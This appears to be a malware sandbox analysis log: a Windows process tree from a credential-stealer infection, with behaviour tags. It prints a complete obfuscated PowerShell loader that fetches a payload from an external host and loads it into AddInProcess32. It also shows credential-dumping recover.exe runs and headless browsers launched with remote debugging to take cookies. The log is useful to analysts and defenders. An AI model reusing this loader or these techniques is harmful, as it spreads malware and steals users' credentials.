C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8353fdcf8,0x7ff8353fdd04,0x7ff8353fdd106⤵PID:4780
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1940,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1932 /prefetch:26⤵PID:5504
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --field-trial-handle=2200,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2196 /prefetch:36⤵PID:5688
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --field-trial-handle=2484,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2476 /prefetch:86⤵PID:4828
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3204 /prefetch:16⤵
- Uses browser remote debugging
PID:5972
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3236 /prefetch:16⤵
- Uses browser remote debugging
PID:2176
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=4688,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4680 /prefetch:86⤵PID:1864
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=4776,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4772 /prefetch:86⤵PID:4116
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4900,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4896 /prefetch:16⤵
- Uses browser remote debugging
PID:5016
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4924,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4920 /prefetch:16⤵
- Uses browser remote debugging
PID:3308
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4916,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5344 /prefetch:16⤵
- Uses browser remote debugging
PID:5944
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5372,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3192 /prefetch:16⤵
- Uses browser remote debugging
PID:556
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4956,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4732 /prefetch:16⤵
- Uses browser remote debugging
PID:1684
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=5376,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4920 /prefetch:86⤵PID:2276
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4680,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4692 /prefetch:16⤵
- Uses browser remote debugging
PID:380
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=4760,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4892 /prefetch:86⤵PID:3772
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5028,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5556 /prefetch:16⤵
- Uses browser remote debugging
PID:5868
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=3212,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5572 /prefetch:86⤵PID:3400
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=4732,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5504 /prefetch:16⤵
- Uses browser remote debugging
PID:5024
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=3380,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3332 /prefetch:86⤵PID:4788
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5548,i,9107552585095891670,6369473620226885454,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5688 /prefetch:26⤵
- Uses browser remote debugging
PID:1848
-
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\zbswyhgrfgkmcxkxpuns"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5068
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\cwxpzzrssoczmdybyfauflfs"5⤵PID:4964
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\cwxpzzrssoczmdybyfauflfs"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2744
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\mychajbmgwueokufpqnniyrbnmx"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5056 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff82bdef208,0x7ff82bdef214,0x7ff82bdef2206⤵PID:2932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=2152,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:36⤵PID:4608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2120,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:26⤵PID:5972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=2448,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2452 /prefetch:86⤵PID:3412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3424,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3420 /prefetch:16⤵
- Uses browser remote debugging
PID:1432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --pdf-upsell-enabled --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4156,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:16⤵
- Uses browser remote debugging
PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=3824,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:86⤵PID:1644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=4428,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:86⤵PID:2448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=4708,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:86⤵PID:3460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5472,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:86⤵PID:2816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5472,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:86⤵PID:4040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5644,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5648 /prefetch:86⤵PID:5832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5788,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5784 /prefetch:86⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5888,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:86⤵PID:1236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5808,i,9008443488905497824,10294356187686864787,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5604 /prefetch:86⤵PID:5536
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
PID:3648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\polyporous.bat1⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\wscript.exewscript //nologo "C:\Windows\Temp\taluqdars.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#By#GU#YwBs#Gk#bgBp#G4#Zw#g#D0#I##n#D##LwBC#Fo#eQ#y#GU#Yg#4#Fg#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bj#HI#eQBw#HQ#bwBj#G8#YwBj#HU#cw#g#D0#I##k#HI#ZQBj#Gw#aQBu#Gk#bgBn#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bk#HI#ZQBh#HI#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#aQBh#DY#M##w#Dc#M##1#C4#dQBz#C4#YQBy#GM#a#Bp#HY#ZQ#u#G8#cgBn#C8#Mw#y#C8#aQB0#GU#bQBz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Xw#y#D##Mg#1#D##N##w#DM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#FM#cgBl#Hk#b#Bl#GE#aw#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bj#G8#YwBr#GU#eQBl#GQ#I##9#C##J#BT#HI#ZQB5#Gw#ZQBh#Gs#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#Z#By#GU#YQBy#Ck#Ow#k#HQ#ZQBs#GU#cwB5#G4#Yw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GM#bwBj#Gs#ZQB5#GU#Z##p#Ds#J#BT#WM#bwBu#G8#bQBl#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bo#GE#dQBz#GU#bg#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#By#GU#c#By#G8#dgBp#G4#Zw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#FMBYwBv#G4#bwBt#GU#KQ#7#CQ#dQBy#HQ#ZQB4#HQ#cw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#Gg#YQB1#HM#ZQBu#Ck#Ow#k#HI#ZQBw#HI#bwB2#Gk#bgBn#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#dQBy#HQ#ZQB4#HQ#cw#g#C0#ZwB0#C##J#By#GU#c#By#G8#dgBp#G4#Zw#7#CQ#cgBl#H##cgBv#HY#aQBu#Gc#I##r#D0#I##k#FMBYwBv#G4#bwBt#GU#LgBM#GU#bgBn#HQ#a##7#CQ#YgBp#HM#a#Bv#H##I##9#C##J#B1#HI#d#Bl#Hg#d#Bz#C##LQ#g#CQ#cgBl#H##cgBv#HY#aQBu#Gc#Ow#k#GM#YQBs#Gw#YQB0#C##PQ#g#CQ#d#Bl#Gw#ZQBz#Hk#bgBj#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HI#ZQBw#HI#bwB2#Gk#bgBn#Cw#I##k#GI#aQBz#Gg#bwBw#Ck#Ow#k#GM#bwB1#G4#d#Bl#HI#bQBl#GE#cwB1#HI#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#GE#b#Bs#GE#d##p#Ds#J#Bl#GM#YwBo#G8#bgBk#HI#bwBz#Gk#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#dQBu#HQ#ZQBy#G0#ZQBh#HM#dQBy#GU#KQ#7#CQ#bgBv#G4#aQBu#HY#bwBs#HY#ZQBk#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#YwBy#Hk#c#B0#G8#YwBv#GM#YwB1#HM#L##n#DE#Jw#s#Cc#Qw#6#Fw#VQBz#GU#cgBz#Fw#U#B1#GI#b#Bp#GM#X#BE#G8#dwBu#Gw#bwBh#GQ#cw#n#Cw#JwBw#G8#b#B5#H##bwBy#G8#dQBz#Cc#L##n#EE#Z#Bk#Ek#bgBQ#HI#bwBj#GU#cwBz#DM#Mg#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBi#GE#d##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:4880
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
PID:5824
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1328
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5868
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\polyporous.bat1⤵PID:972
-
C:\Windows\system32\wscript.exewscript //nologo "C:\Windows\Temp\taluqdars.vbs"2⤵
- Checks computer location settings
PID:4836 -
